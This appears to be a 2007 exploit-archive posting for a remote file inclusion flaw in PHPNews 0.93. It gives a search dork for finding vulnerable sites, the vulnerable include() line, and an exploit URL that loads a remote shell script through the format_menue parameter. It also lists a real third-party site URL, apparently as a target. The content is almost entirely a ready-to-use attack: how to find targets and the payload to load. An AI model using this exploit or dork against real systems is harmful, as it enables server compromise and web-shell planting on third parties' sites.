[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : PHPNews 0.93 (format_menue) Remote File Inclusion Vulnerability
# Published : 2007-08-07
# Author : kezzap66345
# Previous Title : PhpHostBot <= 1.06 (svr_rootscript) Remote File Inclusion Vulnerability
# Next Title : FrontAccounting 1.12 Build 31 Remote File Inclusion Vulnerability
?????__________________________________________?????
????????_____________________________________???????
???????????_________________________________????????
??????????????_____________________________?????????
????????????????__________________________??????????
???????????????????______________________???????????
?????????????????????___________________????????????
??????????????????????_________________?????????????
????????????????????????_______________?????????????
??????????????????????????_____________?????????????
___?????????????????????????__________??????????????
_____?????????????????????????________??????????????
________???????????????????????_______??????????????
___________??????????????????????_____??????????????
________________???????????????????___??????????????
_____________________???????????????__??????????????
___________________________????????????????????????_
_____________________???????????????????????????____
______________???????????????????????????????_______
___________???????????????????????????????????______
________????????????????????????????????????????____
______????????_____??????????????????????????????___
____?????????_______??????????????????????????????__
__???????????_______???????????????????????????????_
_?????????????_____?????????????????????????????????
????????????????????????????????????????????????????
????????????????????????????????????????????????????
????????????????????????????????????????????????????
????????????????????????????????????????????????????
_??????????????????????????????????????????????????_
__?????????????????????????????????????????????????_
_____?????????????????????????????????????????????__
_________????????????????????????????????????????___
_______________??????????????????????????????????___
_________________???????????????????????????????____
_________________???????????????????????????________
________________??????????_____??????????___________
_________________?????_________?????_________?????__
__________????_________????____________?????????____
__________?????????????????_____??????????__________
__________?????????????????___?????_________________
__________?????______??????_________________________
##############################################################################################
##############################################################################################
##############################################################################################
##############################################################################################
# PHPNews <= Remote File Inclusion Vulnerability
#
#Dork:"PHPNews Version 0.93"
#
#Vuln Code
##############################################################################################
##############################################################################################
##############################################################################################
#
#ERROR1:admin/inc/change_action.php
#
#<?PHP
include ("$format_menue");
#?> <<< RFI CODE
#
#
#BUG1:admin/inc/change_action.php?format_menue=
#
#Example1:http://site.com/path/admin/inc/change_action.php?format_menue=[[Sh3LLScript]]
#
##############################################################################################
##############################################################################################
##############################################################################################
#
#http://www.crear.de/2003/dienste/phpdownloadlinks_0.6/load_page.php?uid=9
#
##############################################################################################
##############################################################################################
##############################################################################################
#
#LEETSECURITY.ORG <<<< sanal alemde bizde variz...(A?iklar bundan sonra ilk LeetSecurity'de)
#
#
#####special thanx:###..Str0ke..####..KEZZAP66345..####..Wocker..#############################
##############################################################################################
##############################################################################################
# www.Syue.com [2007-08-07]